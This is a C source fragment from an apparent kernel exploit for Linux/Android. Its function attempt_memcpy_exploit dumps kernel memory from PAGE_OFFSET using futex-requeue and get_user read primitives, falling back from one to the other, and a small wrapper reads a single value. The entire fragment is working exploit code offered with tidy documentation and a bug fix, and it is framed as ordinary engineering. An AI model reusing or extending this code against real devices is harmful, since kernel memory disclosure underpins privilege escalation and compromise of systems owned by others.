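/*
 * Copy KERNEL_SIZE bytes starting at PAGE_OFFSET into a heap buffer and pass
 * that buffer to callback_func.
 *
 * Two read primitives are tried in order, both starting at offset 0x00008000:
 * futex_read_values_at_address() in batches of FUTEX_REQUEUE_MAX_REQUEST_COUNT
 * values, and, only if a batch read fails, get_user_read_value_at_address()
 * one value at a time from the same start offset.  Each loop stops at the
 * first failed read.  The 4-byte stride matches the int values the primitives
 * fill in (inferred from futex_read_value_at_address()'s int *value parameter
 * -- confirm against the primitive definitions).
 *
 * @param callback_func   Called as callback_func(mem, KERNEL_SIZE,
 *                        callback_param) only after a complete copy.  The
 *                        buffer is freed before this function returns, so the
 *                        callback must not retain the pointer.
 * @param callback_param  Opaque value forwarded to callback_func.
 * @return true when the copy and the callback both succeeded; false when the
 *         buffer could not be allocated, when both read paths failed, or when
 *         the callback returned false.
 *
 * Fix: the original only printed a message on malloc() failure and then kept
 * going, writing through a NULL pointer; allocation failure now returns false.
 */
bool attempt_memcpy_exploit(exploit_memory_callback_t callback_func, void *callback_param)
{
    printf("Try copying kernel memory... It will take a long time.\n");

    void *mem = malloc(KERNEL_SIZE);
    if (!mem) {
        printf("malloc(): failed\n");
        return false;
    }

    bool result = true;

    printf("Attempt futex exploit...\n");
    for (int i = 0x00008000; i < KERNEL_SIZE; i += 4 * FUTEX_REQUEUE_MAX_REQUEST_COUNT) {
        /* Byte offset applied via char * -- arithmetic on void * is a GNU extension. */
        void *dst = (void *)((char *)mem + i);
        if (!futex_read_values_at_address(PAGE_OFFSET + i, dst, FUTEX_REQUEUE_MAX_REQUEST_COUNT)) {
            result = false;
            break;
        }
    }

    if (!result) {
        /* Fallback path: restart from the same offset one value at a time. */
        result = true;
        printf("Attempt get_user exploit...\n");
        for (int i = 0x00008000; i < KERNEL_SIZE; i += 4) {
            void *dst = (void *)((char *)mem + i);
            if (!get_user_read_value_at_address(PAGE_OFFSET + i, dst)) {
                result = false;
                break;
            }
        }
    }

    if (result) {
        result = callback_func(mem, KERNEL_SIZE, callback_param);
    }

    free(mem);
    return result;
}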
/*
 * Read a single int at @address into *value.
 *
 * Thin convenience wrapper: delegates to futex_read_values_at_address() with a
 * count of one and returns its result unchanged.
 *
 * @param address  Address to read from.
 * @param value    Destination for the one value read.
 * @return whatever futex_read_values_at_address() returns.
 */
bool futex_read_value_at_address(unsigned long address, int *value)
{
    enum { SINGLE_VALUE = 1 };

    bool ok = futex_read_values_at_address(address, value, SINGLE_VALUE);
    return ok;
}